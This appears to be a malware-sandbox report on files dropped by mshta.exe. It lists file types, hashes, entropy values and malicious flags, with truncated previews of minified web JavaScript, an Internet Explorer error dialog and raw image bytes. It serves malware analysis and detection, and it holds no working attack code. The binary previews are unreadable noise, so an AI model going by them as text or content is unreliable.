                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (27571)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):27667
                                                                                                                                                                                                                                Entropy (8bit):5.435593973496815
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:viB2Yweb/sEDWk82DMVLXDTQHw92z+b/hNBpKA8I4udOJ5WuhyY0hSOKXq+Z2/:viBbEsWk9gU+VNBpzAuO3bOKXHZ2/
                                                                                                                                                                                                                                MD5:483BF43C5686548F38E48328EE18DC16
                                                                                                                                                                                                                                SHA1:8CE585783E2668B4A27FEDDA40FF7EDA78369510
                                                                                                                                                                                                                                SHA-256:EACE43048A1F56C8E41E2640332350C5E4C47B848EA96CFB1FFD334719A48533
                                                                                                                                                                                                                                SHA-512:287FA0855CDBAC628CDD4152B26AC6AD5321583D228E1CD1BD225E2899B4FE019CC25EECFF3760F8C693B77712D30452C2F1C08DDD02A56AF2E95C9D04AFF156
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[4935],{25863:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var i,r,a=n(32735);function o(){return(o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e}).apply(this,arguments)}const s=function(e){return a.createElement("svg",o({viewBox:"0 0 18 11","aria-labelledby":"setinha1Icon setinha1Desc"},e),i||(i=a.createElement("title",null,"icone de setinha")),r||(r=a.createElement("path",{fill:"inherit",d:"M2.1 0L0 2.1 9 11l9-8.9L15.9 0 9 6.8 2.1 0z"})))}},3126:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var i,r=n(32735);function a(){return(a=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e}).apply(this,arguments)}const o=function(e){return r.createElement("svg",a({fill:"
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (26993)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):27084
                                                                                                                                                                                                                                Entropy (8bit):5.460556309656924
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:6o0CyUivaKO05O8uDYHed29jM9DHxr4q10rjM9DpM2kUbnGlklwUvMzc5QUD/89Y:6ofyUWOf75WaJDKxPUbGlklwU/foQD
                                                                                                                                                                                                                                MD5:158545F000AC65FBD2C2053B395663CD
                                                                                                                                                                                                                                SHA1:2E921FF9C0C2F7C364E588116EECBE6F58DBB0A9
                                                                                                                                                                                                                                SHA-256:23E81F7D4D1A0187DE6E96ECA45C9A1F9AF4DCD77B417385B772E967D268BB8D
                                                                                                                                                                                                                                SHA-512:FDC29C7F3816DA27BD25F78B5C10A9319FF617A1D9481B25B202C9FC9FFA785E114AC113863169E94228E35EE440EA08068E4B0212F8783A3E8A57B6AE868CEA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[9345],{45534:(e,t,n)=>{n.d(t,{Z:()=>a});var o,r=n(32735);function i(){return(i=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e}).apply(this,arguments)}const a=function(e){return r.createElement("svg",i({viewBox:"0 0 24 24","aria-labelledby":"closeIcon closeDesc"},e),o||(o=r.createElement("path",{d:"M6.06 5L12 10.94 17.94 5A.75.75 0 0119 6.06L13.06 12 19 17.94A.75.75 0 0117.94 19L12 13.06 6.06 19A.75.75 0 015 17.94L10.94 12 5 6.06A.75.75 0 116.06 5z",fill:"inherit"})))}},21105:(e,t)=>{var n=Object.prototype.hasOwnProperty;function o(e){try{return decodeURIComponent(e.replace(/\+/g," "))}catch(t){return null}}function r(e){try{return encodeURIComponent(e)}catch(t){return null}}t.stringify=function(e,t){t=t||"";var o,i,a=[];for(i in"string"!==typeof t&&(t="?"),e)if(n.ca
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (13201)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13313
                                                                                                                                                                                                                                Entropy (8bit):5.298226828350203
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:RvpwJV6OJ9hFrsE0Q/GFdvwJV6Oa4hFrsE0LVz0NP+SFSnnxDpr71q1jHBQEhqg+:RhwV9Y8IvwhYPl0NyI19ggzCIC8tgr
                                                                                                                                                                                                                                MD5:6F89F8B17509A037FCC31B1DD3B99499
                                                                                                                                                                                                                                SHA1:6FBCCB7CDC6AB820F1227741D144CB07E457266A
                                                                                                                                                                                                                                SHA-256:6459B4DBA7698D1D74AF0CF9DEF5E28BE6CD57E8B21B2279F91E4B4103F74A29
                                                                                                                                                                                                                                SHA-512:DED0ABDD0EBC7B105F54D84311636156734AC5AAAD5AB5E245B062798E71CD15F1BF1122D058F5F8C7EF9F78BFBDF086C8F2C0ECE606F51BD3E8F17A487D2526
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[5645],{85207:e=>{var n={kind:"Document",definitions:[{kind:"OperationDefinition",operation:"query",name:{kind:"Name",value:"CookieHeaders"},variableDefinitions:[],directives:[],selectionSet:{kind:"SelectionSet",selections:[{kind:"Field",name:{kind:"Name",value:"cookies"},arguments:[],directives:[]},{kind:"Field",name:{kind:"Name",value:"headers"},arguments:[],directives:[]}]}}],loc:{start:0,end:44}};n.loc.source={body:"query CookieHeaders {\n cookies\n headers\n}\n",name:"GraphQL request",locationOffset:{line:1,column:1}};var t={};function i(e,n){for(var t=0;t<e.definitions.length;t++){var i=e.definitions[t];if(i.name&&i.name.value==n)return i}}n.definitions.forEach((function(e){if(e.name){var n=new Set;!function e(n,t){if("FragmentSpread"===n.kind)t.add(n.name.value);else if("VariableDefinition"===n.kind){var i=n.type;"NamedType"===i.kind&&t.add(i.name.value)}n.selectionSet&&n.selectionSet.selections.forEac
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (61477)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):61571
                                                                                                                                                                                                                                Entropy (8bit):5.474088357195367
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:t8MlbIwODYayNH04yljeRM9R0E4axoIyeBHv:pci5042eRM9Rj4zIyex
                                                                                                                                                                                                                                MD5:C0DBAFACF4834B8EA409FDED93630EF9
                                                                                                                                                                                                                                SHA1:52593A3D1EB438C99DF046C177D6626806E1753D
                                                                                                                                                                                                                                SHA-256:153F19A31821F63A8CBAC764E1293F687C20B3E2BCDE30A05CBC2CDB52971D36
                                                                                                                                                                                                                                SHA-512:536C645F9C8A31BE2668DC5BA9A0143BBF73F05B14780AA2F6E10192C74D4DFF47F17C8F3C07963FB405D5C4022FD123F60EFB6597DB8FEF28A1213F107E99AE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[8600,9359],{74796:(e,t,n)=>{"use strict";n.d(t,{Z:()=>c});var i,r,a,o=n(32735);function s(){return(s=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e}).apply(this,arguments)}const c=function(e){return o.createElement("svg",s({viewBox:"0 0 315 314","aria-labelledby":"ameSymbolIcon ameSymbolDesc"},e),i||(i=o.createElement("circle",{fill:"inherit",cx:157.5,cy:157.5,r:156.5})),r||(r=o.createElement("path",{d:"M146.767 117.423c7.623 7.619 19.988 7.619 27.611 0l32.725-32.71c3.624-3.624 8.32-5.503 13.07-5.68V79h-119.2v.032c4.751.177 9.45 2.057 13.08 5.681l32.714 32.71z",fill:"#FFF",opacity:.6})),a||(a=o.createElement("path",{d:"M267.428 117.412l-32.713-32.7c-4-3.997-9.302-5.876-14.542-5.68-4.749.179-9.447 2.058-13.07 5.68l-32.724 32.71c-7.623 7.62-19.989 7.62-27.613 0l-32.713-32.71c-3.63
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3247
                                                                                                                                                                                                                                Entropy (8bit):5.459946526910292
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                                                                                                MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                                                                                                SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                                                                                                SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                                                                                                SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):285
                                                                                                                                                                                                                                Entropy (8bit):3.0648219798227685
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:nStlVlPq4VVO1VMaRq8V8BGaTu0MjDtq+EtUhhk//A/l9ms8:cAVMgVPEudjDtqRUhh/l9ms8
                                                                                                                                                                                                                                MD5:2E85899818427B96F57DB55DD05D06A7
                                                                                                                                                                                                                                SHA1:97DD1C541DF27AB842557955390AD1D48A204706
                                                                                                                                                                                                                                SHA-256:3B8BFA505FC51242D5B2452E3BCE6C89DA12923FB0AD61F00EE72100C9CB3CD0
                                                                                                                                                                                                                                SHA-512:3C57FDCE71D42124BA28ADBDCCFE87BE7DCE26950BE32935ECF4A4AA54E5AFA9AFD46F1EA66E5EABC56956465E65377E4976EDD563FDFCA9CE14AB551A5CC0E4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:......JFIF.............C.rOVdVGrd]d.yr......................................................C.y.........................................................................."............................................................................................................?......
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 300 x 450, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):85760
                                                                                                                                                                                                                                Entropy (8bit):7.992780094817998
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:NBgIoJ68FrPbfoG94psyD9P0WNea7DbSkRGxaiJ0+04o:ry5Pbwnt0Wj7DbSwiJ0+07
                                                                                                                                                                                                                                MD5:E8163D26FF96FB69B00C9A6F78BB5496
                                                                                                                                                                                                                                SHA1:47C03FB368212AC4AB63A53E5A55E0F2BDA7F9E0
                                                                                                                                                                                                                                SHA-256:BEF25D79E189E8DC05C5A9905CE2B5DF82A658E15C6F64233A9FE3C79B41C35F
                                                                                                                                                                                                                                SHA-512:6575FFC90662680C1A48555C3CAB970C66429D65EC845532760C85A8B750B2BF415D67DCF0198A5C0E5541A5D667C1CB16073CC8538B6B60ECF260438E133BE8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:.PNG........IHDR...,.........U3.....pHYs............... .IDATx...$yv..9.G<2....yp...M{d....e.2..l..ha-..x.?@[..xm.......0.H$@.-K.e..4...3==.......xq"..U..5.~...n.........9..=.'...|..]....A...)...,..I..b.......=X..}d..7i..a..3.X.i<.......O..|:...,`m.{...{...=..S.Z.I..(o......%{.S0.>s..Q^G?EQ........0h}...=..I....Q.@). h}...1..'}..vo.....zY.....I.{..O.]..O..>...Q....~.vo.f...X..d<.....>U.......{8r.\...^;Y/.y..>.}..u.(W.t..vo..........O..a...y..r.vg.).....d..?...3...ww....a>.....~:..../rw.....x..8..p.)....X.A.<.<F..1.~...w..}...y.......[../....!.....G.l.@].nw..z`.,..]'X.....c8].~..9.....~.y.........-.\..!.o..|...{.....q$........... ~Vu.@Eq'.....A.e. (....^.....H.....Z...{.ov....a...?.$?.~......O.....a:....u?..U(Xw...eI....4...m+...qqY...Sk..7n{+...._.q{Y.-.#.9t....K.......U..zu...{n....N.s.....}......".....<...2...../@.q._.7.7...0s3H......nl.....-..As..6.uYv.........2......pW.o...{~.a..t.w.W..W...e.7.9(.........m.p...w...Y...X..9<
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 300 x 450, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):80160
                                                                                                                                                                                                                                Entropy (8bit):7.991780190344353
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:ZMpWio8B27BuLdktWdjrqW2M1tt1HKghByYQA19AyCDORIOkCUDjd21d3l:CpW788YLdvZgzklAyFwXU15l
                                                                                                                                                                                                                                MD5:7C5990F802FA9E8237BCABB89687D117
                                                                                                                                                                                                                                SHA1:BE1A2BAC80A8581EA8A71B34CCAA20DD3771865E
                                                                                                                                                                                                                                SHA-256:D0BA519BEE7A159CEC24559C59C846AB11AA02C0B3858C99927459CB0B5EBE88
                                                                                                                                                                                                                                SHA-512:3B0168BFD9E756AEAC982D71D54E2D3164FE3A1B6E8F430BBFA5492953B3337EAEA66BA16B78CCF26B1DD62D56A17D0DB102A11DE9B954CD75FFBB2736A3E889
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:.PNG........IHDR...,.........U3.....pHYs............... .IDATx..i.%.u..;.Uu.}.{.^wO/./........0...)..%h...%l.q..V.vH!.e+.H.....'...vH...AK.-J.@q...........t........2k.....m..t...VeUe....9y....>.k8v.w&..X>....0.... .J>..8..c9..&....~g...5`...}.3q,..........o...=..c9.{$.Q&..h./.+C.........\}......2.K...U...`...q.A.}.X.Q....c9..P.E..#h..........c9..`q._........X..}`t.@.}.X..;....X..X.l...|.>.[....<......{...=.....c9..[..r...srD..!.(.{....ae.}...r,.*J.pn..v....4+.....p...h.:V...A..P..@..5J.Y.....~..........+... ....(......^.Vr-...i'.^.Mw...}..{.......O...U"....$...U........>...s<.=.k.......RJ.~..c..`.....{e.z .k.X...b..B..........A....)L.;I......7.-y...Jx.. h+E..{.U.n-O..F.)......X...#...........b....^5....f..<.j..w.<3;.L.W..G........M...$I..8.U4|....f..!..u......t4..G.G..AeX....I.a.XE.......JR.......m.nZ...|..B....S.!...~.?...3[.>.. 6......@..s.". M..}..A.k...K_E.bn.nU..N-|..+;6.... .?.L..J.^....{2/4!.i;j..J6..u+...U...\c./....~...`"...g.cL....40
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):230753
                                                                                                                                                                                                                                Entropy (8bit):7.995131763292654
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:6144:JOzhmQOfUCCStpBS1GPUPoHnBdNGsPbTQewPMcYDy8cislnCyVyDTG:8zkQkw1aUQ5Gsz9wUngislnCyUO
                                                                                                                                                                                                                                MD5:48E40F4B5613BF236D7779BA4C2E6F7B
                                                                                                                                                                                                                                SHA1:5D3EA09B769CE94B34CC4F58CDC0134F494CA3ED
                                                                                                                                                                                                                                SHA-256:CDDB4D4014D8CB8BCF466CFC8DA1491B6AC3C8D5FA84B7699B072D50D888E540
                                                                                                                                                                                                                                SHA-512:AEB620D81AEEF58ABFFD88E61E41F9279B89E6D3F3D4E2C2DEE545F9FBB81CF30E29F8241BDCB8DF811C1D12B49A34B5891A569F854AA8DD033CD3C7344F7D3E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..[.$.}..........pfx.r$R.ER.%...rw....h-....'...f........_.........+..5.......]-E...Cr8.....s?u..?DfUV....:..CWW..Gdf..?..k<g.$c...j....W....x....+.J:.Xp~v:6.E.9>yN$.O.^.L..8.4.]..X\..4.._.5.....$..z......i.'V.qT&..o.u.....Y....m+.......D..K....+....lLI..L.........j.2.e..E.......V.h.?}..6.........1j.`.<....^...b..v...2\..G..%...q..\....?.....-..*..(..$.<."m:....q.yDO..7..B..).'..+..f..4....e.W...!..W$6.ZZ4..NX..W.<T.W!/Nn.]....j.q.....R6.zC.i......e.......G.e..F:.P.3..P...E.C.z.+k..H.'..?:.....I.2.=............Y.....,......o&..M"%..|*p.....tr>.{h%.....is..PdIo.$.Z$U......u..B..s.).O....,.-.&..:..^../^..[..6K...G..(.i..4m=;.Xp~..y..{.....jU..x[G.Im..243.+..Wt.".(.mM'E..d..Ia....R...b..]4..b...u?.*T.j.VX..J.W..:..y.I...d.&......x..7....-6...".e...eE..Y...p.D..h.........V~.s.zl....L.g.-.HO....d.py/.,..BW,g.Z...M..pY.Y-d.'.E..`..AB.Uc.&l.n...u..B....HyPa.A.vZE.h.....[..4.
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):289529
                                                                                                                                                                                                                                Entropy (8bit):7.9932652654098675
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:6144:KW+2YoKwvVf5652mJUrKbSGoXtSLkqbc4ijrmo:t+5Gto5R22bSGIlr9
                                                                                                                                                                                                                                MD5:87BDE4CC492DCCB0F7D07560224F43D0
                                                                                                                                                                                                                                SHA1:0F1B2372C7F2D6D1E6F952108805007E7CE894D4
                                                                                                                                                                                                                                SHA-256:D8E3F0F1EB9B5E5CF6AF84B9794BB1603ED4EA10F89F3A85CCEAA07581AFF5F5
                                                                                                                                                                                                                                SHA-512:B77F1065FD81DBCD1DE91CD67C4294599F7A4F2FD52F7F26AAF71659B597B5010E87B9E6F3016E6D4FF9321CC6B6A665405706D72651F333850EF6C5DB967EB7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx.....y........0.m.P$...h..mY....s.C..p.p./.....C.....VX.M.h#.J.II... D.$@...`.^k.<......=..,.'....*+;..}_."K.@.....F...it....$..Z...=....W~..o>':.....:.V....&..........|..Q...>.......q......s.m.............p|..A..'z.'.[.{....h.....L0D....=.q....9.R...4nCy......g.=|.A.......k...N;....-..z.......vg:..N...u>...^......s..n.n..=..).I...$.n.E...<tz....T.D..v)..9tO2v.n...]...`.F~...'.7L.....p..B......8.=....^...d,L.7|..p.L0....e]...B.:...|.>...F]...|a..}.......i.nu.v.8L.....t."....t[^?.?h..#m.F.'..q.....f}?.p.....M.M"u........O......Z .Z..Ph.v.aR......Et\jL0....#.zd...1.e..&.....o..4...:..u.(...\3.=.~..n..n..}.....z.n......^.k?....g.>..bmO....,...F..^.v'EmEs..%?;...$6.....0...$....7....|?Z..'.`7......&8j....T...Gy.y.ip78...hx.......Ok..R....G%...v?..g4....R.u_~wW..|...$.n...~.6(#.|mooO.I..C.K?..A...^..d3.%.............}av..~.0....|X...t.Fx.......]..&....Ft..
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):20554
                                                                                                                                                                                                                                Entropy (8bit):7.982094652208921
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:4DcejaqliCkGTnjmi8xPf4/20axacg6NUHKOcYuycaV7S733E/Ro/LU4vI:7Dhimw/PadgHKOcYZV8nSWhvI
                                                                                                                                                                                                                                MD5:85153A9FD2A9EC151100DB6EF3F37538
                                                                                                                                                                                                                                SHA1:F7A11DE9353C98C102AB552782DBB6E85154A254
                                                                                                                                                                                                                                SHA-256:CAA105F646916CDA3C4284F6491BBE9616D7F333AF5B4C2E6BA759A155B6EB77
                                                                                                                                                                                                                                SHA-512:9985BFA5D8017A3B1D3BE2C996A6698819E79D19827562A27E81E5A4AAA4C7C429232E30934659F885E481C0883B72516CB60366507A756DC81A928C00E0B8E0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.PNG........IHDR...............).....pHYs............... .IDATx..y...y..U.=..W+..I..n.C`c.8.....'..8.c'.q.8...q....c..;.....`.1..!.!$...V....tW...kg.!.....3.2..].SO.U...oA..1b..#F..1b..#F..1b..#F..1b..#F..1b.1. ^.......Y.8.4..).....0....^...D0t!L.1.....1a.F...gt=..n.H8....s...J.z.+..#.Y...e1bTB..U..1@.=.]..o<...B....g...*........a...fM.y...#.p.T..-4...`....U....`._2.?..%8W..W.X...9".%....1.c...J....D.F..Z.G..../:..lZ....9m.|0....wd...?F.............\.}.J..).....Q.>......([w.D.1.1.....a$..;...`.F.....Z?....0._...1.0.......t..x_.....MY.5Z...y..1.-.1.7$>........7.w.r^.q..b..F.........!..g.'.~\.^`.U ...i..2F..e(.E..Q...k..*...u.]}....M:...1.d.. L......O...S{.g..Fpu..M.5..c,...)6|.X...........1bLPh*Hn$.......}.X].X.<k.7......z..cG.^$...P.j..>...z.W9j..v.~.>./8|.;.b......~..td?... +.9....cdH....z.UG.{....\....&Dl.c.8^...4..s..OU/,1........@4.D.....Dt..t..n...G|..r...N)dL..1.3..6.K...9E..;.V.qe.#&...3....5F....;/...SG.^?"..9.r...n.+..
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7112
                                                                                                                                                                                                                                Entropy (8bit):7.924860964662241
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:RSJn0uSggSE9kfAeKx/nhOuw+KxaFWv6i79ZXIsN:4Jn0sgSLfIoUFEz9my
                                                                                                                                                                                                                                MD5:9752D3F384A2675C19311BE15A991228
                                                                                                                                                                                                                                SHA1:3006077CD816AAAB7FF70B131007757C57A8A3EB
                                                                                                                                                                                                                                SHA-256:314092B97C6799B7AE8BDC1FE633C2B426A41CEA81E08DB6B0315C594CA9BA89
                                                                                                                                                                                                                                SHA-512:339FA570002565C6FCEC40E67BABFD0A1675995FF4335D7830F13E4AB73C620936CF9A8C3AA3B0998BB9247DCACD206FDB00C85C48029594A603BE7454212D64
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.PNG........IHDR...............).....pHYs................zIDATx....p..........^....U.XD'(...... G....F..UFO.._..x.....m..u....hq....(i..%.W[.\...#yw...$&a.}.g.......d...w......|~(.i.....v.....:Q.0.D1......N...:Q.0.D1....@b....a...<4.|c..........\.S.L.P..d.....0...Ql..8........9.wh.....p..]......9...P....W......f...(.../.......L.ret]..N...p#.E..&.w....`....5..=.'.\......:...........s.. .::.a.u/.p+.6X{..`.p)..d.`m...@........Nc..O.)~....+.../..].`....&..L....+..`e.w~....c..Q..yYD...X..7XY.A...7....=.#....{...+3..+......"..OTh....y~...+.......=.7Q..<..2..(/....)....eD.x.V.4.f.U..4.......M.2..3w/.......<...}.:X....k..X...s-....+c9]......j.BD.Y...\f.K....p"...X.s.m....c..:QP.X.;....}...vc.,..\..+{cd?.&.+.Lu.9"..TX....}:..e.BD......d...X..k...+..,..W&..D@mg.(..2)D......N.dD.?.H......>.n.CN.5...\5+....j.OD.s.........N.8D..`e4#...s.e!".e.h..O..."......[....]Y..G...).......|R....2.}*.!..(....|.73..*..BD>...F.._.CA..?..u...`.?e!"..C.3..O.0.................
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):89094
                                                                                                                                                                                                                                Entropy (8bit):7.99480829678378
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:vL7YP4W2zJhcThrk3fRCojq2QvNCQJEAOorvRxge0XxvqxKXw0ECa7vppSjn9lrH:vLUPkUdkZBq2fQJX1j0hyxKATFHWrQNc
                                                                                                                                                                                                                                MD5:93835852287A8145E4E28CD40A9B9530
                                                                                                                                                                                                                                SHA1:16A7081DDD02E55F0C3B38C29F4D88D59B1E6D47
                                                                                                                                                                                                                                SHA-256:83070AD62528A0C79954BECD9F94535A915BEEAB67A8F6F4807E875BC2BDB577
                                                                                                                                                                                                                                SHA-512:636969B6D5BEAEDB49EEE7D856A2A514ED42609C2E0B8B985070AB84D2FD91EC1F6B08BAECFD2A2520A34F6C4111F38A293DC2731563601BDA3948B1FF4D24C3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......(........\....pHYs............... .IDATx...w.]W}'...s.m.U..l..j..,Y..Ms70...0. .$..H..7..y.f&of.>.!.&.......L.!.1%..-w[..e.z.....{.._[..A.l.......[k...2......\.G...r... .q..k0.v...>..(z.Wr..955...A....H..vs~...8......D....O...;..?.J....5.......:T|....b0.......L...cdd.C##....s+.k...g.rO?-(.Ni..q.MI.p....D.).f.Q........IdUG..T..m.....'.".. .....Q.\..`........#...x.......-._.2...bQv...U..-.L.0.x.L........G."CA....C.\...E..D@Uu..8)d|U7N.$......`.*.9.o... P..9....X`....t.....R.5..a.RV.......B5.A.....HY....~..El.>Q.j.(.....D.B..pT0J....`6JrR.O.Q.(I..2..-.....*S"0.@1..1.!.4V.PAk{>....px.8.....@]U.....5..U...d...Gx.8."..B.r.j....b...S)...D.].."...z..<.....2_...J.v..A1pvw.Z.o....`r[F.m<N.f..sbpm....It.0..:.0..0....B.>/-p..E..h..C.'0..+...tK.s...1TyUP..)..(..._.C..U..^,._W=.[..k.AJCC....D ..@.n..J<...(...(:..........H6J).A.......8Z...-X..j*.^E:.Q-tI......b.J. &1=>U....l...4..9Z9.=.J.(..-.@T.Az..GlV.@._jU`6.Q<......A...A....R.p.F.
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):73030
                                                                                                                                                                                                                                Entropy (8bit):6.11057987816918
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:4c/e9ctt1/dZuSyQAvLlNC6uyEQcocibqccchcScs/t+BOtsQaR4:/GK71VZuSLWlU3PULm5sV+otT
                                                                                                                                                                                                                                MD5:196D643C13C70CCDAD9F353EF1BE3BC0
                                                                                                                                                                                                                                SHA1:D5AA2862E189B1DE64CBA5FBF1956F2D987C7FF0
                                                                                                                                                                                                                                SHA-256:379B13D576D1B5991FE14E5C4D05C917D34282B038E0BBCE7A9A2C48AE90CF35
                                                                                                                                                                                                                                SHA-512:965B996315AD5B335A97060FB2B36F3C151563572241F7AB5132480CC3517D42B68A894335195D01BC73CAAB96023B1C9D2E5214A75296C7B77E7B5C3C4A7AF3
                                                                                                                                                                                                                                Malicious:false
